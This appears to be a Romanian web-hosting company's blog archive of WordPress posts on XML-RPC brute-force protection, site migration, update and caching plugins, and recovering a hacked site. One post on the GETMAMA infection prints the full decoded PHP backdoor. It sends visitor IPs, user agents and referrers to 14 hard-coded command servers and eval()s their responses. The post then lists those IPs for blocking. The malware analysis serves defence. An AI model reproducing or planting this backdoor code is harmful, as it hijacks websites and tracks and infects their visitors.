intrebari legate de tipul de atac XML-RPC pe platformele de tip WordPress

What-is-XML-RPC-in-WordPress-and-How-To-Stop-an-AttackAdevarul este ca DA exista o protectie impotriva acestor atacuri si au intrat in vigoare cu ceva vreme in urma. In plus exista protectie si pentru o multitudine de incercari de login provenite de la acelasi XML-RPC. Cei de la WordPress au creat un asa numit “proof-of –concept attack” expres pentru a dovedi ca utilizatorii platformei lor sunt protejati insa acel script nu este publicat tocmai pentru a nu educa posibilii hackeri care targeteaza siteurile WordPress.

Pentru a fi totul cat mai clar chiar daca un hacker include 1000 de login-uri intr-o singura cerere, Wordfence ii blocheaza in mod automat dupa x incercari. Acest numar x este dat de setarea dvs. de brute-force. Trimiterea de multiple incercari de accesare este inutila pentru orice hacker atata timp cat utilizatorul si detinatorul siteului foloseste Wordfence.

Unul dintre beneficiile de a utiliza cel mai bun plug-in de securitate din lume pentru platforma WordPress este ca sunt conectati direct prin/cu WordPress API, spre deosebire de alte produse de acelasi tip care folosesc un anumit tipar compatibil ca sa-si indeplineasca taskurile. Deci Wordfence intervine imediat prin aplicatia pe care o monitorizeaza constant si complet.

Din acest motiv nu a fost necesar modificarea programului Wordfence pentru a oferi protectia impotriva atacurilor. Te protejeaza pur si simplu in mod direct.

Gasiti articolul despre wordfence aici: https://www.wordfence.com/blog/2015/10/wordpress-xml-rpc-brute-force-attacks-amplification-multiple-logins/?utm_source=list&utm_medium=email&utm_campaign=xmlrpc3

 


Transferul unui blog de pe wordpress.org la Claus Web

Pe parcursul dezvoltarii si existentei unei afaceri online sau a unui blog, indiferent in ce domeniu, puteti ajunge la momentul in care sa doriti mai mult pentru site-ul pe care il detineti. Host-ul pe care il aveti sa nu va mai satisfaca cerintele si atunci decideti sa va mutati la un altul, mai performant, mai up-to-date si mai puternic. Este mereu o decizie inteleapta atata timp cat stiti ce va doriti, ce buget doriti sa alocati si care sunt problemele pe care doriti sa le eliminati.

O astfel de situatie este momentul in care decideti sa abandonati pagina creata pe wordpress.rog si sa alegeti un host profesionit. In general, majoritatea firmelor de hosting de prestigiu, de incredere, ofera serviciul de transfer de la vechiul server, al fostei firme de hosting la noul in mod gratuit. Un astfel de exemplu este si Claus Web, care garanteaza servere de calitate, asistenta prompta si deschisa spre comunicare plus un uptime de 99%. Atunci cand cineva are nevoie de un transfer de site, mai ales wordpress, nu isi va muta numai fisierele pe alt server deoarece un site alfat in bloghosting are nevoie de compatibilitate pentru foldere, baze de date, module de securitate si toate fisierele: comentarii, articole, alte tipuri de continut, poze, programe si fisiere multimedia, video-uri.
wordpress
Este un procedeu simplu si nu necesita cunostinte speciale in domeniu. In primul rand trebuie sa comandati un cont de hosting de pe siteul Claus Web. Odata creat contul de gazduire veti prin un user si o parola pentru accesul la cPanel. Odata logat in cont, va trebui sa instalati platforma WordPress. O puteti face fie folosind Softaculous din cPanel, fie manual incarcand arhiva ultimei versiuni de WordPress descarcata de pe siteul oficial al producatorului, fie sa cereti aceasta operatiune unui tehnician Claus Web printr-un mesaj catre asistenta@claus.ro. Dupa aceea, din meniul de administrare al WordPress-ului vechi, trebuie sa mergeti la Tools si apoi la Export. Trebuie sa selectati daca vreti sa descarcati toate informatiile sau numai comentarii, fisiere, articole. Apoi se da click pe Export File. Toate datele, comentarii, articole, informatii continute in baze de date for fi stocate intr-un fisier excel care nu va contine imaginile. Acestea se vor descarca separat. Dupa aceea va logati la instalatia WordPress din contul de gazduire (accesati linkul http://domeniuldumneavoastra.ro), apoi, trebuie sa mergeti din nou la Tools si apoi la Import. Se alege WordPress si apoi, cand sunteti intrebati, trebuie sa alegeti WordPress Importer si apoi sa alegeti Install. Se selecteaza fisierul excel de pe desktop si apoi finalizati transferul de date dupa instructiunile care vi se furnizeaza.

Acum, instalatia WordPress de pe contul de gazduire de la Claus Web contine toate informatiile pe care le aveati pe pagina veche de pe wordpress.org si sunteti pregatiti pentru a dezvolta siteul dumneavoastra intr-un mediu profesionist si performant. Internetul este plin de informatii despre cum se gestioneaza o instalatie WordPress si modalitati de optimizare a acestuia.


ActualizareWordPress, fără bătăi de cap

Este bine cunoscut faptul ca platforma WordPress lanseaza patchuri si updateuri de securitate foarte des, din cauza numeroaselor vulnerabilitati. Problema este ca majoritatea proprietarilor de siteuri create in WordPress, nu isi fac aceste actualizari constant si in regim de urgenta, astfel ca devin victimele atacurilor din internet. Actualizarea platformei la cateva momente de la aparitia rezolvarii garanteaza un grad de protectie si securitate foarte ridicat, chiar si pentru cele mai vulnerabile siteuri.
Dar in sfarsit a aparut o solutie reala si de calitate pentru utilizatorii WordPress care nu fac actualizarile la timp sau nu dispun de timpul necesar. Se numeste Automatic Updater si va deveni in scurt timp, unul din pluginurile indispensabile oricarui utilizator serios de WordPress.
Practic, acest plugin va actualiza in mod automat platforma WordPress, pluginurile si temele, fara sa fie nevoie sa va logati. In plus, va notifica printr-un mail de fiecare data cand a facut un update.
update
Pentru a-l instala trebuie doar sa va logati in panoul de control al WordPress-ului dumneavoastra (accesand http://domeniuldumneavoastra.ro/wp-admin), navigati la meniul Plugins si folositi optiunea Add New (sau Adauga). In bara de search veti scrie doar „automatic updater”; veti instala primul plugin afisat, apasand pe Install Now (sau Instealeaza acum). Pe urmatoarea pagina, apasati pe Activate Plugin (respectiv Activeaza). In lista de pluginuri, care va aparea dupa operatiunile precedente, daca migrati la butonul Settings (Setari) din dreptul Automatic Updater puteti selecta ce componente doriti sa fie actualizate automat (WordPress, pluginuri sau teme) sau puteti introduce o adresa de mail pe care doriti sa primiti notificarile si alte setari. Dupa ce ati configurat pluginul asa cum doriti, doar apasati pe Save changes (sau Salveaza setari).

GATA! Din acest moment, instalatia ta WordPress se va actualiza automat si veti scapa de grija update-urilor. Desi nu este 100% perfectionat si este in continua dezvoltare, specialistii web deja il numesc „cel mai important plugin WordPress din ultimii ani”. In cazul unor erori generate de actualizari, echipa Claus Web va poate pune oricand la dispozitie o arhiva a contului dumneavoastra printr-un simplu mail la asistenta@clausweb.ro

Claus Web recomanda tuturor clientilor sai care folosesc o platforma WordPress instalarea pluginul Automatic Updater. In cazul in care doriti ca un tehnician Claus Web sa instaleze pentru dumneavoastra acest plugin, va rugam sa ne scrieti doar un mail catre asistenta@clausweb.ro in care sa mentionati numele siteului dumneavoastra si faptul ca doriti instalarea Automatic Updater.


GETMAMA – Un nou virus pe wordpress infecteaza fisierul XMLRPC.php

In lumea bloggerilor GETMAMA – Un nou virus pe wordpress infecteaza fisierul XMLRPC.phpa intrat un nou virus numit GETMAMA, nu va lasati indusi in eroare de numele acestuia, este unul dintre cele mai complexe virusuri deoarece este bine codat, ceea ce il face greu de depistat sau de inlaturat. Acesta afecteaza doar unele site-uri web afisand ferestre pop up. Luati aminte, acest virus afecteaza fisierul XMLRPC.php printre altele si doar utilizatorii de Windows. Codul este afisat doar o data pe zi pentru un ip si atunci nu afiseaza la toata lumea codul cu problema.

Noul virus este descris ca fiind unul “conditional” deoarece, in momentul infectarii acesta trimite informatia inapoi catre atacatori si are optiunea de a infecta un site, de a rula o comanda sau chiar de a nu face nimic. Informatii precum adresa de IP si date despre utilizatorul ce acceseaza site-ul ajung la dezvoltatorii acestui virus, iar acestia pot hotara daca sa afiseze continutul malitios sau nu. Daca acest continut malitios este afisat, acesta va va aparea doar o singura data pe zi, prin intermediul adresei de IP si doar utilizatorilor de Windows.

Acest virus a fost decodat si expus pe blogul celor de la sucuri.net. Forma decodata nu arata deloc cu forma virusului pe care o veti intalni, aceasta fiind codata pentru a o face mai greu de depistat.

if (!function_exists(“GetMama”)){

function mod_con($buf){str_ireplace(“”,””,$buf,$cnt_h);if ($cnt_h == 1) {$buf = str_ireplace(“”,”” . stripslashes($_SERVER[“good”]),$buf); return $buf;}str_ireplace(“”,””,$buf,$cnt_h);if ($cnt_h == 1) {$buf = str_ireplace(“”,stripslashes($_SERVER[“good”]).””,$buf); return $buf;}

return $buf;}function opanki($buf){$gz_e = false;$h_l = headers_list();if (in_array(“Content-Encoding: gzip”, $h_l)) { $gz_e = true;}if ($gz_e){$tmpfname = tempnam(“/tmp”, “FOO”);file_put_contents($tmpfname, $buf);$zd =
gzopen($tmpfname, “r”);$contents = gzread($zd, 10000000);$contents = mod_con($contents);gzclose($zd);unlink($tmpfname);$contents = gzencode($contents);} else {$contents = mod_con($buf);}$len = strlen($contents);header(“Content-Length: “.$len);return($contents);}

function GetMama(){$mother = “compromisedsite.com”;return $mother;}

ob_start(“opanki”);

function ahfudflfzdhfhs($pa){$mama = GetMama();$file = urlencode(__FILE__);if (isset($_SERVER[“HTTP_HOST”])){$host = $_SERVER[“HTTP_HOST”];} else {$host = “”;}if (isset($_SERVER[“REMOTE_ADDR”])){$ip = $_SERVER[“REMOTE_ADDR”];} else {$ip = “”;}if (isset($_SERVER[“HTTP_REFERER”])){$ref = urlencode($_SERVER[“HTTP_REFERER”]);} else {$ref = “”;}if (isset($_SERVER[“HTTP_USER_AGENT”])){$ua = urlencode(strtolower($_SERVER[“HTTP_USER_AGENT”]));} else {$ua = “”;}if (isset($_SERVER[“QUERY_STRING”])){$qs = urlencode($_SERVER[“QUERY_STRING”]);} else {$qs = “”;}

$url_0 = “http://” . $pa;
$url_1 = “/jedi.php?version=0991&mother=” .$mama . “&file=” . $file . “&host=” . $host . “&ip=” . $ip . “&ref=” . $ref . “&ua=” .$ua . “&qs=” . $qs;
$try = true;

if( function_exists(“curl_init”) ){$ch = curl_init($url_0 . $url_1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
$ult = trim(curl_exec($ch));
$try = false;}

if ((ini_get(“allow_url_fopen”)) && $try) {$ult = trim(@file_get_contents($url_0 . $url_1));$try = false;}

if($try){$fp = fsockopen($pa, 80, $errno, $errstr, 30);if ($fp) {$out = “GET $url_1 HTTP/1.0\r\n”;
$out .= “Host: $pa\r\n”;
$out .= “Connection: Close\r\n\r\n”;
fwrite($fp, $out);
$ret = “”;
while (!feof($fp)) {$ret  .=  fgets($fp, 128);}fclose($fp);$ult = trim(substr($ret, strpos($ret, “\r\n\r\n”) + 4));}}

if (strpos($ult,”eval”) !== false)
{
$z = stripslashes(str_replace(“eval”,””,$ult)); eval($z); exit();
}
if (strpos($ult,”ebna”) !== false){$_SERVER[“good”] = str_replace(“ebna”,””,$ult);return true;}
else {return false;}}

$father2[] = “78.46.173.14”;
$father2[] = “176.9.218.191”;
$father2[] = “91.228.154.254”;
$father2[] = “77.81.241.253”;
$father2[] = “184.82.117.110”;
$father2[] = “46.4.202.93”;
$father2[] = “46.249.58.135”;
$father2[] = “176.9.241.150”;
$father2[] = “46.37.169.56”;
$father2[] = “46.30.41.99”;
$father2[] = “94.242.255.35”;
$father2[] = “178.162.129.223”;
$father2[] = “78.47.184.33”;
$father2[] = “31.184.234.96”;
shuffle($father2);
foreach($father2 as $ur){if ( ahfudflfzdhfhs($ur) ) { break ;}}}

Cam atatea au fost spuse de acest virus, iar in continuare va oferim cateva solutii ce va va ajuta sa scapati de el.Pentru a-l inlatura este indicat verificarea traficului urmatoarelor adrese de IP si, ulterior, blocarea lor.

78.46.173.14
176.9.218.191
91.228.154.254
77.81.241.253
184.82.117.110
46.4.202.93
46.249.58.135
176.9.241.150
46.37.169.56
46.30.41.99
94.242.255.35
178.162.129.223
78.47.184.33
31.184.234.96

O alta alternativa este oferita pe site-ul edeir.ro si propune urmatoarea solutie, instalarea plugin-ului wordfence ce va efectua o scanare. Daca va depista ca fisierul XMLRPC.php a fost modificat sau oricare alt fisier de la wordpress inseamna ca ati fost infectat de acest virus. Stergeti fisierele respective, cautati ultima versiune de wordpress, in acesta veti gasi toate fisierele orginale care trebuie incarcate pe server. Exista un singur inconvenient, veti pierde orice personalizare facuta, dar veti elimina cu siguranta acest virus, desi exista sanse ca el sa revina daca aveti alte brese de securitate in difeirte teme sau pluginuri instalate.

Multa bafta in eliminarea virusului!


WordPress super cache plugin

WordPress super cache plugin

Cum sa faci WordPress-ul sa se incarce mai repede in 5 minute

Daca ti-ai creat deja un site WordPress si ai inceput deja sa ai peste 50-100 de cititori zilnici, este recomandabil sa faceti cateva modificari la modul cum este accesat. Pentru site-urile cu trafic mijlociu si mare, construite pe platforma WordPress, se recomanda folosirea unui plugin care genereaza pagini HTML statice. Odata generate, aceste pagini sunt afisate vizitatorilor, astfel serverul foloseste mai putine resurse si, implicit, site-ul se “incarca” mai repede.

Sunt o multime de astfel de pluginuri disponibile pentru WordPress, cele mai cunoscute fiind WP Super Cache si WP Total Cache.

Claus Web recomanda WP Super Cache deoarece este foarte usor de instalat si folosit.

Instalarea este foarte-foarte simpla si dureaza maxim 5 minute, in 5 pasi usor de urmat:

  1. Va logati in contul dumneavoastra de Administrator la http://domeniultau.ro/wp-admin
  2. Navigati la meniul Plugins si selectati Add New
  3. In bara de cautare scrie Super Cache si dati click pe primul rezultat
  4. Apasati Install Now si dati click pe Ok cand apare fereastra de confirmare
  5. Asteptati sa se instaleze dupa care apasati Activate Now.

Gata! WP Super Cache este instalat pe site-ul dumneavoastra WordPress si beneficiate de toate avantajele site caching. Acest plugin poate fi oricand configurat din Plugins >> Installed Plugins >> click pe butonul Edit din dreptul WP Super Cache.


Vulnerabilitati WordPress

WordPressS.O.S. WordPress-ul meu a fost spart!!!

 Deci, ai instalat cu atentie WordPress, ti-ai facut site-ul sa arata exact asa cum iti place tie, cu o tema decenta, cu cateva plugin-uri speciale si ai incarcat cateva pagini cu continut interesant. Pe scurt, ai investit timp si efort in site-ul tau.

Dupa aceea, intr-o zi, din senin, incerci sa iti accesezi pagina din browser si constati stupefiat ca aceasta ori nu mai exista, ori afiseaza o eroare ciudata sau te redirectioneaza catre o site cu continut dubios (reclame agresive, continut pornografic sau jocuri de noroc).

Iti vom explica pas cu pas, ce trebuie sa faci daca scenariul de mai sus ti s-a intamplat si tie.

Ramai calm.

Trebuie sa ramai calm pentru a face fata acestei situatii. Primul pas, inainte de a raporta oricare incident legat de securitatea site-ului tau, este sa te calmezi si sa analizezi situatia, pentru a nu face greseli suplimentare si a gandi un plan de actiune.

Scaneaza de urgenta PC-ul

            De multe ori, virusii sau robotii (fie malware, adware, spam, etc) ajung pe site-ul tau prin intermediul unui sistem desktop (sau laptop) compromis. Daca folosesti un sistem care ruleaza Windows, acceseaza panoul de comanda al antivirusului tau si ruleaza o asa numita “scanare full” pe PC-ul tau. Lasa operatiunea sa mearga pana in capat, iar dupa urmeaza recomandarile antivirusului. Nu uita sa te asiguri ca baza de date a antivirusului este actulizata la zi inainte de a rula acestul full scan. Totusi, o parte din virusi sunt foarte priceputi in a detecta comportamentul programelor antivirus si a se ascunde de aceste scanari, deci sa nu crezi ca scanarea neaparat te scapa de toti virusii.

 Ia legatura cu firma de hosting  

Este posibil sa nu fi singurul afectat de acest “atac informatic”, mai ales daca folosesti shared-hosting. De aceea, este foarte indicat sa iei legatura cu firma care iti asigura gazduirea, sa raportezi acest incident si sa ceri ajuor de la personalul de la asistenta  tehnica. De asemenea, este primul loc in care poti sa primesti o confirmare corecta a faptului ca ai fost victim unui hack sau a fost doar o greseala tehnica.

Schimba parola urgent

Schimba-ti parola urgent pentru toate conturile la care ai acces. Parola de admin, parola de FTP, parola pentru MySQL user, pentru cPanel, pentru whm, etc. Orice parola de la orice cont la care ai acces si prin care s-ar fi putut infiltra un “musafir nepoftit”. Incearca sa folosesti parole alfanumerice (care contin cifre si litere), litere mari si mici si nu au o logica foarte usor de ghicit.

Parole usor de spart: parola, parola123, password, angela1988, 18061988 (data nasterii), florinparola, andrei33fluture, zZz666.

Parole greu de spart: eFF23gmE77, roC36mE66, s9sLZ5k, m35Str6, u36RBdi:8Fo1JX, 5gN18hTSd, U*’q:p^#1/5]=%&. (Atentie! nu toate site-urile accepta parole cu caractere special de genul “^*$(:)#” )

Schimba secret key-ul

Daca ti-au furat parola si inca sunt logati pe site-ul sau blog-ul tau, chiar daca iti schimbi parola, hackerii sau robotii vor ramane conectati cu drepturi depline. De ce ? Pentru simplul fapt ca exista asa numitele cookies, care contin informatiile tale de logare si raman active foarte mult timp. Pentru a inlatura aceasta bresa in securitatea site-ului tau, trebuie sa iti creezi un nou secret key. Este relativ simplu si foarte util. Viziteaza site-ul official WordPress, cauta secret key in bara de seach, obtine un set nou de secret keys. Dupa care, tot ce trebuie sa faci este sa schimbi datele vechi din fisierul tau wp-config.php  cu cele noi.

Fa un back-up cu fisierele care ti-au mai ramas

Daca fisierele si baza ta de date sunt inca vizibile, ar fi o idee buna sa faci un back-up ca sa le poti investiga mai tarziu. Totodata, daca ceva se intampla in timpul procesului de curatare a site-ului, poti oricand sa incepi din nou folosind acest back-up. Pentru a preveni orice neintelegeri, fii sigur ca denumesti aceasta arhiva folosind expresii ca si “hacked_site_backup”.

Citeste articole despre cazuri similare

Sunt o multime de articole bune pe internet despre ce sa faci in cazul in care suspectezi un hack. Ideea este sa stii ce cauti. Expresii ca si “Curatarea unui site wordpress virusat”, “Inlaturare malware de pe wordpress blog” sau “Protejarea wordpress de virusi”, introduse in Google, va vor aduce in fata ochilor sute de astfel de articole.

Verifica fisierul .htaccess

Hackerii sau robotii iti pot folosi fisierul .htaccess pentru a directiona vizitatorii site-ului tau catre pagini care contin virusi sau continut periculos.  Verifica in toate folderele site-ului tau, nu doar in cel principal. Hackerii vor incearca sa-si ascunda codul la sfarsitul unui fisier, asa ca fa scroll pana jos, la ultimele randuri. Ar putea, de asemenea, sa schimbe permisiunile pentru .htaccess. Schimbati intotdeauna permisiunile inapoi la 644. (chmod 644)

Ia in considerare o stergere totala

Una din metodele cele mai eficiente de a scapa de virusi sau brese de securitate este a sterge absolut toate fisierele din spatial tau virtual si sa golesti baza de date WordPress. In cazul in care faci acest lucru, vei avea nevoie de o baza de date curata, pentru a restaura continutul. Luati legatura cu personalul de la Asistenta Tehnica inainte de a incepe acest proces. Numai daca faceti o restaurare folosind un back-up “curat” si uploadati din nou prin FTP sau SFTP plugin-urile si tema WordPress, pastrate sub forma de back-up din timp, puteti sa fiti sigur ca aveti un site curat, fara nicio linie de cod periculoasa.

Upgrade!

Odata ce sunteti in posesia unui site curat, este imperial necesar sa faceti upgrade la toata instalatia WordPress la cea mai nou varianta. Versiunile mai vechi sunt mai predispuse la hack-uri decat cele noi. Faceti upgrade la absolut orice element puteti.

Verificati log-urile

Dupa ce ati reusit sa reveniti la un site curat si functional, este momentul sa detectam sursa infectiei. Verificati log-urile site-ului dumneavoastra ca sa descoperiti unde a fost bresa de securitate si cum au actionat hackerii. Sunt o gramada de programe de tip open-source (OSSEC este un exemplu bun) care pot analiza aceste log-uri si sa-ti ofere raspunsuri concludente. O alta solutie sunt forumurile de specialitate, unde va puteti posta log-urile, iar utilizatorii experimentati le vor analiza si va vor oferi solutii de securitate.

Faceti back-up

Acum ca tot acest cosmarul a luat asfarsit, e timpul sa incepeti sa va comportati ca un utilizator responsabil. Faceti back-up regulat si update regulat. Update-ul il faceti de cate ori exista o versiune noua disponibila. Back-up se poate face zilnic, saptamanal, de doua sau trei ori pe luna, dupa necesitati. Pentru a va usura munca, citit despre cron-jobs; sunt niste sarcini pe care le puteti seta sa se intample la anumite perioada de timp, fara a necesita interventia administratorului.

Daca totusi veti mai fi atacat din nou, o sa aveti intotdeauna la indemana o arhiva “curata”  si o gramada de informatii care sa va ajute!

Sursa:  http://codex.wordpress.org/FAQ_My_site_was_hacked